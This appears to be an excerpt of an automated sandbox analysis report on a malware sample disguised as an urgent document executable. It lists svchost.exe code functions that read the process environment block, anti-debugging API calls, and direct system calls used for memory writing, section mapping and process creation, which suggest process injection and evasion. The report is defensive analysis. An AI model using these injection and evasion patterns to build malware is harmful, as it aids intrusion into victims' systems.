                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804500 mov eax, dword ptr fs:[00000030h]4_2_03804500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375E5E7 mov eax, dword ptr fs:[00000030h]4_2_0375E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037325E0 mov eax, dword ptr fs:[00000030h]4_2_037325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C5ED mov eax, dword ptr fs:[00000030h]4_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376C5ED mov eax, dword ptr fs:[00000030h]4_2_0376C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037365D0 mov eax, dword ptr fs:[00000030h]4_2_037365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A5D0 mov eax, dword ptr fs:[00000030h]4_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A5D0 mov eax, dword ptr fs:[00000030h]4_2_0376A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E5CF mov eax, dword ptr fs:[00000030h]4_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E5CF mov eax, dword ptr fs:[00000030h]4_2_0376E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037545B1 mov eax, dword ptr fs:[00000030h]4_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037545B1 mov eax, dword ptr fs:[00000030h]4_2_037545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B05A7 mov eax, dword ptr fs:[00000030h]4_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B05A7 mov eax, dword ptr fs:[00000030h]4_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B05A7 mov eax, dword ptr fs:[00000030h]4_2_037B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E59C mov eax, dword ptr fs:[00000030h]4_2_0376E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732582 mov eax, dword ptr fs:[00000030h]4_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03732582 mov ecx, dword ptr fs:[00000030h]4_2_03732582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03764588 mov eax, dword ptr fs:[00000030h]4_2_03764588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375A470 mov eax, dword ptr fs:[00000030h]4_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375A470 mov eax, dword ptr fs:[00000030h]4_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375A470 mov eax, dword ptr fs:[00000030h]4_2_0375A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BC460 mov ecx, dword ptr fs:[00000030h]4_2_037BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EA456 mov eax, dword ptr fs:[00000030h]4_2_037EA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372645D mov eax, dword ptr fs:[00000030h]4_2_0372645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375245A mov eax, dword ptr fs:[00000030h]4_2_0375245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376E443 mov eax, dword ptr fs:[00000030h]4_2_0376E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0376A430 mov eax, dword ptr fs:[00000030h]4_2_0376A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E420 mov eax, dword ptr fs:[00000030h]4_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E420 mov eax, dword ptr fs:[00000030h]4_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372E420 mov eax, dword ptr fs:[00000030h]4_2_0372E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372C427 mov eax, dword ptr fs:[00000030h]4_2_0372C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037B6420 mov eax, dword ptr fs:[00000030h]4_2_037B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768402 mov eax, dword ptr fs:[00000030h]4_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768402 mov eax, dword ptr fs:[00000030h]4_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03768402 mov eax, dword ptr fs:[00000030h]4_2_03768402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037304E5 mov ecx, dword ptr fs:[00000030h]4_2_037304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037644B0 mov ecx, dword ptr fs:[00000030h]4_2_037644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BA4B0 mov eax, dword ptr fs:[00000030h]4_2_037BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037364AB mov eax, dword ptr fs:[00000030h]4_2_037364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037EA49A mov eax, dword ptr fs:[00000030h]4_2_037EA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0372CB7E mov eax, dword ptr fs:[00000030h]4_2_0372CB7E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DEB50 mov eax, dword ptr fs:[00000030h]4_2_037DEB50
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4B4B mov eax, dword ptr fs:[00000030h]4_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4B4B mov eax, dword ptr fs:[00000030h]4_2_037E4B4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6B40 mov eax, dword ptr fs:[00000030h]4_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037C6B40 mov eax, dword ptr fs:[00000030h]4_2_037C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037FAB40 mov eax, dword ptr fs:[00000030h]4_2_037FAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037D8B42 mov eax, dword ptr fs:[00000030h]4_2_037D8B42
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EB20 mov eax, dword ptr fs:[00000030h]4_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EB20 mov eax, dword ptr fs:[00000030h]4_2_0375EB20
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F8B28 mov eax, dword ptr fs:[00000030h]4_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037F8B28 mov eax, dword ptr fs:[00000030h]4_2_037F8B28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037AEB1D mov eax, dword ptr fs:[00000030h]4_2_037AEB1D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738BF0 mov eax, dword ptr fs:[00000030h]4_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738BF0 mov eax, dword ptr fs:[00000030h]4_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03738BF0 mov eax, dword ptr fs:[00000030h]4_2_03738BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_0375EBFC mov eax, dword ptr fs:[00000030h]4_2_0375EBFC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037BCBF0 mov eax, dword ptr fs:[00000030h]4_2_037BCBF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037DEBD0 mov eax, dword ptr fs:[00000030h]4_2_037DEBD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750BCB mov eax, dword ptr fs:[00000030h]4_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750BCB mov eax, dword ptr fs:[00000030h]4_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03750BCB mov eax, dword ptr fs:[00000030h]4_2_03750BCB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730BCD mov eax, dword ptr fs:[00000030h]4_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730BCD mov eax, dword ptr fs:[00000030h]4_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03730BCD mov eax, dword ptr fs:[00000030h]4_2_03730BCD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740BBE mov eax, dword ptr fs:[00000030h]4_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03740BBE mov eax, dword ptr fs:[00000030h]4_2_03740BBE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4BB0 mov eax, dword ptr fs:[00000030h]4_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037E4BB0 mov eax, dword ptr fs:[00000030h]4_2_037E4BB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_03804A80 mov eax, dword ptr fs:[00000030h]4_2_03804A80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 4_2_037ACA72 mov eax, dword ptr fs:[00000030h]4_2_037ACA72
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037ACA72 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376CA6F mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037DEA60 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03736A50 mov eax, dword ptr fs:[00000030h] (7 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03740A5B mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03754A35 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376CA38 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376CA24 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0375EA2E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BCA11 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376AAEE mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03730AD0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03764AD0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03786ACC mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03738AA0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03786AA4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03768A90 mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0373EA80 mov eax, dword ptr fs:[00000030h] (9 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037D4978 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BC97C mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03756962 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0377096E mov edx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0377096E mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B0946 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B892A mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C892B mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BC912 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03728918 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037AE908 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037629F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BE9E0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0373A9D0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037649D0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037FA9D3 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C69C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B89B3 mov esi, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037B89B3 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037429A0 mov eax, dword ptr fs:[00000030h] (13 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037309AD mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BE872 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037C6870 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03760854 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03734859 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03742840 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03752835 mov eax, dword ptr fs:[00000030h] (3 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03752835 mov ecx, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03752835 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376A830 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037D483A mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BC810 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0376C8F9 mov eax, dword ptr fs:[00000030h] (2 occurrences)
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037FA8E4 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0375E8C0 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_037BC89D mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_03730887 mov eax, dword ptr fs:[00000030h]
                Source: C:\Windows\SysWOW64\svchost.exe | Code function: 4_2_0375AF69 mov eax, dword ptr fs:[00000030h]
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_004580A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0042A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_0042A124 SetUnhandledExceptionFilter
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_016B1361 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
                Source: C:\Users\user\Desktop\MA-DS-2024-03 URGENT.exe | Code function: 0_2_016B4C7B SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess

                HIPS / PFW / Operating System Protection Evasion

                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtWriteVirtualMemory: Direct from: 0x77762E3C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtMapViewOfSection: Direct from: 0x77762D1C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtNotifyChangeKey: Direct from: 0x77763C2C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtCreateMutant: Direct from: 0x777635CC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtResumeThread: Direct from: 0x777636AC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtProtectVirtualMemory: Direct from: 0x77757B2E
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQuerySystemInformation: Direct from: 0x77762DFC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtAllocateVirtualMemory: Direct from: 0x77762BFC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtReadFile: Direct from: 0x77762ADC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtDelayExecution: Direct from: 0x77762DDC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtWriteVirtualMemory: Direct from: 0x7776490C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQueryInformationProcess: Direct from: 0x77762C26
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtResumeThread: Direct from: 0x77762FBC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtCreateUserProcess: Direct from: 0x7776371C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtSetInformationThread: Direct from: 0x777563F9
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtOpenKeyEx: Direct from: 0x77763C9C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtSetInformationThread: Direct from: 0x77762B4C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQueryAttributesFile: Direct from: 0x77762E6C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtClose: Direct from: 0x77762B6C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtReadVirtualMemory: Direct from: 0x77762E8C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtCreateKey: Direct from: 0x77762C6C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQuerySystemInformation: Direct from: 0x777648CC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtAllocateVirtualMemory: Direct from: 0x777648EC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQueryVolumeInformationFile: Direct from: 0x77762F2C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtOpenSection: Direct from: 0x77762E0C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtDeviceIoControlFile: Direct from: 0x77762AEC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQueryValueKey: Direct from: 0x77762BEC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtQueryInformationToken: Direct from: 0x77762CAC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtCreateFile: Direct from: 0x77762FEC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtOpenFile: Direct from: 0x77762DCC
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtOpenKeyEx: Direct from: 0x77762B9C
                Source: C:\Program Files (x86)\GoNpTPuIoddQTYaVVREiTLkbqUOHfKnRMyEcTtVRGopSEKLIvFGhudaXrzpjMtDijMJqIxEbBkaRsSz\fbLIkXRoMf.exe | NtSetInformationProcess: Direct from: 0x77762C5C
